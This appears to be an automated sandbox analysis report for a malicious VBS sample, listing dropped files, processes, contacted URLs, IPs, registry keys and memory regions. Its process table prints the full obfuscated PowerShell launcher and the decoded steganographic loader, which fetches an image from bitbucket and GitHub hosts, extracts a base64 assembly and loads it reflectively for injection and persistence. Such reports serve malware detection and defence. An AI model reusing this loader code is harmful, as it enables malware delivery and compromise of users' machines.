Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
OGo8AQxn4k.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nfvjajd.53d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfzkfnbj.ys3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2z5opo.1r3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2eltsap.sno.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw2nih32.akf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt4ciqqh.10o.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OGo8AQxn4k.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
(' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden
-exec
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/jsi18n/en/dj
|
unknown
|
||
|
https://admin.atlassian.com
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://bitbucket.org/blog/migrating-pipelines-1-2x-steps-to-our-new-ci-cd-runtime
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/img/default_
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/themes/a
|
unknown
|
||
|
https://api.bitbucket.org
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
|
unknown
|
||
|
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://preferences.atlassian.com
|
unknown
|
||
|
https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ad
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://bitbucket.status.atlassian.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
|
185.199.109.133
|
||
|
https://id.atlassian.com/profile/rest/profile"
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
|
185.166.143.48
|
||
|
https://bitbucket.org/gateway/api/emoji/
|
unknown
|
||
|
https://bqlf8qjztdtr.statuspage.io
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bitbucket.org
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ap
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/css/entry/ve
|
unknown
|
||
|
https://id.atlassian.com/login?prompt=login&continue=https%3A%2F%2Fbitbucket.org%2Fgdffffffff%2F
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/img/logos/bi
|
unknown
|
||
|
https://id.atlassian.com/login
|
unknown
|
||
|
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://id.atlassian.com/logout
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://id.atlassian.com/manage-profile/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/734f165bd448/dist/webpack
|
unknown
|
||
|
https://bitbucket.org/gdffffffff/ddddd/downlo
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
There are 47 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bitbucket.org
|
185.166.143.48
|
||
|
raw.githubusercontent.com
|
185.199.109.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
185.166.143.48
|
bitbucket.org
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
23B356E0000
|
trusted library allocation
|
page read and write
|
||
|
AD91479000
|
stack
|
page read and write
|
||
|
23B38B92000
|
trusted library allocation
|
page read and write
|
||
|
1C561D6E000
|
heap
|
page read and write
|
||
|
23B35546000
|
heap
|
page read and write
|
||
|
1C562055000
|
heap
|
page read and write
|
||
|
1FDB733B000
|
heap
|
page read and write
|
||
|
1FDB9669000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
7FFD33ED0000
|
trusted library allocation
|
page read and write
|
||
|
23B3897A000
|
trusted library allocation
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
1C563B4F000
|
heap
|
page read and write
|
||
|
23B36EF6000
|
heap
|
page read and write
|
||
|
7FFD33D90000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
1C561D30000
|
heap
|
page read and write
|
||
|
1C561D5B000
|
heap
|
page read and write
|
||
|
7FFD33C71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33CD0000
|
trusted library allocation
|
page read and write
|
||
|
AD9117F000
|
stack
|
page read and write
|
||
|
1C562040000
|
heap
|
page read and write
|
||
|
7FFD33AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
B36247E000
|
stack
|
page read and write
|
||
|
7FFD33CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B4F784000
|
heap
|
page read and write
|
||
|
1C561D9B000
|
heap
|
page read and write
|
||
|
1FDD1770000
|
heap
|
page read and write
|
||
|
23B4F740000
|
heap
|
page read and write
|
||
|
7FFD33D70000
|
trusted library allocation
|
page read and write
|
||
|
1C561E09000
|
heap
|
page read and write
|
||
|
1C561DB4000
|
heap
|
page read and write
|
||
|
23B37FF1000
|
trusted library allocation
|
page read and write
|
||
|
23B4F889000
|
heap
|
page read and write
|
||
|
23B36FF1000
|
trusted library allocation
|
page read and write
|
||
|
23B4F4AD000
|
heap
|
page read and write
|
||
|
1C561D5F000
|
heap
|
page read and write
|
||
|
23B35470000
|
heap
|
page read and write
|
||
|
6BBA7FE000
|
stack
|
page read and write
|
||
|
7FFD33D30000
|
trusted library allocation
|
page read and write
|
||
|
23B4F8A3000
|
heap
|
page read and write
|
||
|
1FDB9137000
|
trusted library allocation
|
page read and write
|
||
|
AD915FF000
|
stack
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
7FFD33BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDB737C000
|
heap
|
page read and write
|
||
|
23B4F7FC000
|
heap
|
page read and write
|
||
|
B36344E000
|
stack
|
page read and write
|
||
|
7FFD33F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDB951F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33AC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33EFC000
|
trusted library allocation
|
page read and write
|
||
|
B36227D000
|
stack
|
page read and write
|
||
|
1FDB7373000
|
heap
|
page read and write
|
||
|
23B37F24000
|
trusted library allocation
|
page read and write
|
||
|
23B37212000
|
trusted library allocation
|
page read and write
|
||
|
1C561D98000
|
heap
|
page read and write
|
||
|
7FFD33CD0000
|
trusted library allocation
|
page read and write
|
||
|
23B4F89B000
|
heap
|
page read and write
|
||
|
7FFD33CB0000
|
trusted library allocation
|
page read and write
|
||
|
23B37978000
|
trusted library allocation
|
page read and write
|
||
|
B3633CE000
|
stack
|
page read and write
|
||
|
1C561CC0000
|
heap
|
page read and write
|
||
|
7FFD33DA0000
|
trusted library allocation
|
page read and write
|
||
|
23B4F700000
|
heap
|
page execute and read and write
|
||
|
23B4F85E000
|
heap
|
page read and write
|
||
|
B3629FB000
|
stack
|
page read and write
|
||
|
23B4F600000
|
heap
|
page read and write
|
||
|
1C561DA9000
|
heap
|
page read and write
|
||
|
B362677000
|
stack
|
page read and write
|
||
|
7FFD33DB0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB914E000
|
trusted library allocation
|
page read and write
|
||
|
23B379CA000
|
trusted library allocation
|
page read and write
|
||
|
23B4F917000
|
heap
|
page read and write
|
||
|
6BBA1FE000
|
stack
|
page read and write
|
||
|
7FFD33AD0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB9768000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
23B4F813000
|
heap
|
page read and write
|
||
|
23B4F851000
|
heap
|
page read and write
|
||
|
7FFD33DD0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB7540000
|
heap
|
page readonly
|
||
|
7FFD33AC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B36EE0000
|
trusted library allocation
|
page read and write
|
||
|
B3627FE000
|
stack
|
page read and write
|
||
|
23B356F4000
|
heap
|
page read and write
|
||
|
7FFD33F10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D20000
|
trusted library allocation
|
page read and write
|
||
|
AD90D13000
|
stack
|
page read and write
|
||
|
1FDB94F3000
|
trusted library allocation
|
page read and write
|
||
|
1FDB94B6000
|
trusted library allocation
|
page read and write
|
||
|
1FDB7625000
|
heap
|
page read and write
|
||
|
1FDB8EF5000
|
heap
|
page read and write
|
||
|
7FFD33ED3000
|
trusted library allocation
|
page read and write
|
||
|
6BBA2FE000
|
stack
|
page read and write
|
||
|
AD90DDE000
|
stack
|
page read and write
|
||
|
AD910FE000
|
stack
|
page read and write
|
||
|
7FFD33B76000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDB95E7000
|
trusted library allocation
|
page read and write
|
||
|
23B4F518000
|
heap
|
page read and write
|
||
|
23B4FB10000
|
heap
|
page read and write
|
||
|
AD9177E000
|
stack
|
page read and write
|
||
|
23B4F620000
|
heap
|
page read and write
|
||
|
6BBA6FF000
|
stack
|
page read and write
|
||
|
7FFD33C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C561DA6000
|
heap
|
page read and write
|
||
|
1FDB961B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C75000
|
trusted library allocation
|
page read and write
|
||
|
1C561DA0000
|
heap
|
page read and write
|
||
|
7FFD33C79000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E10000
|
trusted library allocation
|
page read and write
|
||
|
23B36FE0000
|
heap
|
page execute and read and write
|
||
|
23B47007000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
23B471FE000
|
trusted library allocation
|
page read and write
|
||
|
1FDD1577000
|
heap
|
page execute and read and write
|
||
|
23B36F30000
|
trusted library allocation
|
page read and write
|
||
|
1FDD150A000
|
heap
|
page read and write
|
||
|
23B35490000
|
heap
|
page read and write
|
||
|
1FDB9506000
|
trusted library allocation
|
page read and write
|
||
|
B3624FE000
|
stack
|
page read and write
|
||
|
B3625F9000
|
stack
|
page read and write
|
||
|
1FDD14CC000
|
heap
|
page read and write
|
||
|
1C561DBD000
|
heap
|
page read and write
|
||
|
23B354FC000
|
heap
|
page read and write
|
||
|
7FFD33D70000
|
trusted library allocation
|
page read and write
|
||
|
23B38719000
|
trusted library allocation
|
page read and write
|
||
|
AD9157B000
|
stack
|
page read and write
|
||
|
7FFD33EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D60000
|
trusted library allocation
|
page read and write
|
||
|
23B35460000
|
heap
|
page read and write
|
||
|
23B4F81B000
|
heap
|
page read and write
|
||
|
1FDB94E5000
|
trusted library allocation
|
page read and write
|
||
|
B36237F000
|
stack
|
page read and write
|
||
|
1C561DBB000
|
heap
|
page read and write
|
||
|
7FFD33B70000
|
trusted library allocation
|
page read and write
|
||
|
23B4FAC0000
|
trusted library allocation
|
page read and write
|
||
|
23B37F61000
|
trusted library allocation
|
page read and write
|
||
|
1FDB73BB000
|
heap
|
page read and write
|
||
|
B3628FE000
|
stack
|
page read and write
|
||
|
B36297E000
|
stack
|
page read and write
|
||
|
1C561DB0000
|
heap
|
page read and write
|
||
|
7FFD33DE0000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
AD914F7000
|
stack
|
page read and write
|
||
|
23B472EC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D60000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
B3622FE000
|
stack
|
page read and write
|
||
|
23B39137000
|
trusted library allocation
|
page read and write
|
||
|
23B4F939000
|
heap
|
page read and write
|
||
|
23B373E5000
|
trusted library allocation
|
page read and write
|
||
|
1FDD1420000
|
heap
|
page read and write
|
||
|
23B35544000
|
heap
|
page read and write
|
||
|
7FFD33DB0000
|
trusted library allocation
|
page read and write
|
||
|
23B4F878000
|
heap
|
page read and write
|
||
|
23B47019000
|
trusted library allocation
|
page read and write
|
||
|
1C561E19000
|
heap
|
page read and write
|
||
|
AD9167E000
|
stack
|
page read and write
|
||
|
23B354C8000
|
heap
|
page read and write
|
||
|
23B39243000
|
trusted library allocation
|
page read and write
|
||
|
1C561DAC000
|
heap
|
page read and write
|
||
|
B3623FA000
|
stack
|
page read and write
|
||
|
1FDB90E1000
|
trusted library allocation
|
page read and write
|
||
|
1C561D95000
|
heap
|
page read and write
|
||
|
B36354C000
|
stack
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
1FDB7530000
|
trusted library allocation
|
page read and write
|
||
|
B36277C000
|
stack
|
page read and write
|
||
|
6BB9B6A000
|
stack
|
page read and write
|
||
|
1FDB7510000
|
trusted library allocation
|
page read and write
|
||
|
23B4F49F000
|
heap
|
page read and write
|
||
|
6BB9EFE000
|
stack
|
page read and write
|
||
|
B3626F9000
|
stack
|
page read and write
|
||
|
1FDB94E0000
|
trusted library allocation
|
page read and write
|
||
|
B36257E000
|
stack
|
page read and write
|
||
|
7FFD33C4A000
|
trusted library allocation
|
page read and write
|
||
|
1FDB75C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33EF0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB72C0000
|
heap
|
page read and write
|
||
|
23B46FF1000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
7FFD33A9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDB8ED0000
|
heap
|
page execute and read and write
|
||
|
1FDB7620000
|
heap
|
page read and write
|
||
|
7DF4D5BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33DC0000
|
trusted library allocation
|
page read and write
|
||
|
23B38F6C000
|
trusted library allocation
|
page read and write
|
||
|
1C56205D000
|
heap
|
